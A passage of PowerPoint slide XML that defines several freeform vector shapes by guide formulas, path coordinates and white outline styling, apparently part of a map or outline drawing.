                  <a:gd name="T68" fmla="*/ 20 w 123"/>
                  <a:gd name="T69" fmla="*/ 90 h 234"/>
                  <a:gd name="T70" fmla="*/ 21 w 123"/>
                  <a:gd name="T71" fmla="*/ 80 h 234"/>
                  <a:gd name="T72" fmla="*/ 19 w 123"/>
                  <a:gd name="T73" fmla="*/ 72 h 234"/>
                  <a:gd name="T74" fmla="*/ 8 w 123"/>
                  <a:gd name="T75" fmla="*/ 82 h 234"/>
                  <a:gd name="T76" fmla="*/ 12 w 123"/>
                  <a:gd name="T77" fmla="*/ 63 h 234"/>
                  <a:gd name="T78" fmla="*/ 8 w 123"/>
                  <a:gd name="T79" fmla="*/ 57 h 234"/>
                  <a:gd name="T80" fmla="*/ 0 w 123"/>
                  <a:gd name="T81" fmla="*/ 62 h 234"/>
                  <a:gd name="T82" fmla="*/ 7 w 123"/>
                  <a:gd name="T83" fmla="*/ 46 h 234"/>
                  <a:gd name="T84" fmla="*/ 9 w 123"/>
                  <a:gd name="T85" fmla="*/ 35 h 234"/>
                  <a:gd name="T86" fmla="*/ 13 w 123"/>
                  <a:gd name="T87" fmla="*/ 26 h 234"/>
                  <a:gd name="T88" fmla="*/ 18 w 123"/>
                  <a:gd name="T89" fmla="*/ 12 h 234"/>
                  <a:gd name="T90" fmla="*/ 24 w 123"/>
                  <a:gd name="T91" fmla="*/ 5 h 234"/>
                  <a:gd name="T92" fmla="*/ 41 w 123"/>
                  <a:gd name="T93" fmla="*/ 1 h 234"/>
                  <a:gd name="T94" fmla="*/ 46 w 123"/>
                  <a:gd name="T95" fmla="*/ 9 h 234"/>
                  <a:gd name="T96" fmla="*/ 29 w 123"/>
                  <a:gd name="T97" fmla="*/ 28 h 234"/>
                  <a:gd name="T98" fmla="*/ 42 w 123"/>
                  <a:gd name="T99" fmla="*/ 30 h 234"/>
                  <a:gd name="T100" fmla="*/ 62 w 123"/>
                  <a:gd name="T101" fmla="*/ 30 h 234"/>
                  <a:gd name="T102" fmla="*/ 61 w 123"/>
                  <a:gd name="T103" fmla="*/ 45 h 234"/>
                  <a:gd name="T104" fmla="*/ 56 w 123"/>
                  <a:gd name="T105" fmla="*/ 56 h 234"/>
                  <a:gd name="T106" fmla="*/ 46 w 123"/>
                  <a:gd name="T107" fmla="*/ 66 h 234"/>
                  <a:gd name="T108" fmla="*/ 52 w 123"/>
                  <a:gd name="T109" fmla="*/ 70 h 234"/>
                  <a:gd name="T110" fmla="*/ 44 w 123"/>
                  <a:gd name="T111" fmla="*/ 76 h 234"/>
                  <a:gd name="T112" fmla="*/ 39 w 123"/>
                  <a:gd name="T113" fmla="*/ 78 h 234"/>
                  <a:gd name="T114" fmla="*/ 50 w 123"/>
                  <a:gd name="T115" fmla="*/ 77 h 234"/>
                  <a:gd name="T116" fmla="*/ 60 w 123"/>
                  <a:gd name="T117" fmla="*/ 80 h 234"/>
                  <a:gd name="T118" fmla="*/ 70 w 123"/>
                  <a:gd name="T119" fmla="*/ 93 h 234"/>
                  <a:gd name="T120" fmla="*/ 74 w 123"/>
                  <a:gd name="T121" fmla="*/ 112 h 234"/>
                  <a:gd name="T122" fmla="*/ 86 w 123"/>
                  <a:gd name="T123" fmla="*/ 122 h 234"/>
                  <a:gd name="T124" fmla="*/ 91 w 123"/>
                  <a:gd name="T125" fmla="*/ 142 h 234"/>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23"/>
                  <a:gd name="T190" fmla="*/ 0 h 234"/>
                  <a:gd name="T191" fmla="*/ 123 w 123"/>
                  <a:gd name="T192" fmla="*/ 234 h 234"/>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23" h="234">
                    <a:moveTo>
                      <a:pt x="93" y="143"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="97" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="143"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36154" name="Freeform 287"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2610" y="1890"/>
                <a:ext cx="39" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 31 w 39"/>
                  <a:gd name="T1" fmla="*/ 35 h 35"/>
                  <a:gd name="T2" fmla="*/ 29 w 39"/>
                  <a:gd name="T3" fmla="*/ 31 h 35"/>
                  <a:gd name="T4" fmla="*/ 22 w 39"/>
                  <a:gd name="T5" fmla="*/ 32 h 35"/>
                  <a:gd name="T6" fmla="*/ 23 w 39"/>
                  <a:gd name="T7" fmla="*/ 29 h 35"/>
                  <a:gd name="T8" fmla="*/ 21 w 39"/>
                  <a:gd name="T9" fmla="*/ 27 h 35"/>
                  <a:gd name="T10" fmla="*/ 19 w 39"/>
                  <a:gd name="T11" fmla="*/ 24 h 35"/>
                  <a:gd name="T12" fmla="*/ 16 w 39"/>
                  <a:gd name="T13" fmla="*/ 23 h 35"/>
                  <a:gd name="T14" fmla="*/ 15 w 39"/>
                  <a:gd name="T15" fmla="*/ 27 h 35"/>
                  <a:gd name="T16" fmla="*/ 9 w 39"/>
                  <a:gd name="T17" fmla="*/ 30 h 35"/>
                  <a:gd name="T18" fmla="*/ 4 w 39"/>
                  <a:gd name="T19" fmla="*/ 28 h 35"/>
                  <a:gd name="T20" fmla="*/ 1 w 39"/>
                  <a:gd name="T21" fmla="*/ 25 h 35"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 21 h 35"/>
                  <a:gd name="T24" fmla="*/ 6 w 39"/>
                  <a:gd name="T25" fmla="*/ 18 h 35"/>
                  <a:gd name="T26" fmla="*/ 3 w 39"/>
                  <a:gd name="T27" fmla="*/ 15 h 35"/>
                  <a:gd name="T28" fmla="*/ 9 w 39"/>
                  <a:gd name="T29" fmla="*/ 13 h 35"/>
                  <a:gd name="T30" fmla="*/ 11 w 39"/>
                  <a:gd name="T31" fmla="*/ 7 h 35"/>
                  <a:gd name="T32" fmla="*/ 11 w 39"/>
                  <a:gd name="T33" fmla="*/ 4 h 35"/>
                  <a:gd name="T34" fmla="*/ 14 w 39"/>
                  <a:gd name="T35" fmla="*/ 3 h 35"/>
                  <a:gd name="T36" fmla="*/ 18 w 39"/>
                  <a:gd name="T37" fmla="*/ 1 h 35"/>
                  <a:gd name="T38" fmla="*/ 24 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 35"/>
                  <a:gd name="T40" fmla="*/ 27 w 39"/>
                  <a:gd name="T41" fmla="*/ 1 h 35"/>
                  <a:gd name="T42" fmla="*/ 29 w 39"/>
                  <a:gd name="T43" fmla="*/ 2 h 35"/>
                  <a:gd name="T44" fmla="*/ 32 w 39"/>
                  <a:gd name="T45" fmla="*/ 2 h 35"/>
                  <a:gd name="T46" fmla="*/ 34 w 39"/>
                  <a:gd name="T47" fmla="*/ 4 h 35"/>
                  <a:gd name="T48" fmla="*/ 37 w 39"/>
                  <a:gd name="T49" fmla="*/ 13 h 35"/>
                  <a:gd name="T50" fmla="*/ 38 w 39"/>
                  <a:gd name="T51" fmla="*/ 16 h 35"/>
                  <a:gd name="T52" fmla="*/ 37 w 39"/>
                  <a:gd name="T53" fmla="*/ 19 h 35"/>
                  <a:gd name="T54" fmla="*/ 39 w 39"/>
                  <a:gd name="T55" fmla="*/ 25 h 35"/>
                  <a:gd name="T56" fmla="*/ 38 w 39"/>
                  <a:gd name="T57" fmla="*/ 29 h 35"/>
                  <a:gd name="T58" fmla="*/ 35 w 39"/>
                  <a:gd name="T59" fmla="*/ 33 h 35"/>
                  <a:gd name="T60" fmla="*/ 33 w 39"/>
                  <a:gd name="T61" fmla="*/ 34 h 35"/>
                  <a:gd name="T62" fmla="*/ 31 w 39"/>
                  <a:gd name="T63" fmla="*/ 35 h 35"/>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39"/>
                  <a:gd name="T97" fmla="*/ 0 h 35"/>
                  <a:gd name="T98" fmla="*/ 39 w 39"/>
                  <a:gd name="T99" fmla="*/ 35 h 35"/>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39" h="35">
                    <a:moveTo>
                      <a:pt x="31" y="35"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="35"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36155" name="Freeform 288"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2648" y="1878"/>
                <a:ext cx="4" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 4"/>
                  <a:gd name="T1" fmla="*/ 9 h 9"/>
                  <a:gd name="T2" fmla="*/ 0 w 4"/>
                  <a:gd name="T3" fmla="*/ 5 h 9"/>
                  <a:gd name="T4" fmla="*/ 1 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 9"/>
                  <a:gd name="T6" fmla="*/ 4 w 4"/>
                  <a:gd name="T7" fmla="*/ 0 h 9"/>
                  <a:gd name="T8" fmla="*/ 4 w 4"/>
                  <a:gd name="T9" fmla="*/ 6 h 9"/>
                  <a:gd name="T10" fmla="*/ 2 w 4"/>
                  <a:gd name="T11" fmla="*/ 9 h 9"/>
                  <a:gd name="T12" fmla="*/ 1 w 4"/>
                  <a:gd name="T13" fmla="*/ 9 h 9"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T19" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T20" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T21" fmla="*/ 0 w 4"/>
                  <a:gd name="T22" fmla="*/ 0 h 9"/>
                  <a:gd name="T23" fmla="*/ 4 w 4"/>
                  <a:gd name="T24" fmla="*/ 9 h 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 h="9">
                    <a:moveTo>
                      <a:pt x="1" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36156" name="Freeform 289"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1767" y="2809"/>
                <a:ext cx="73" cy="116"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 73"/>
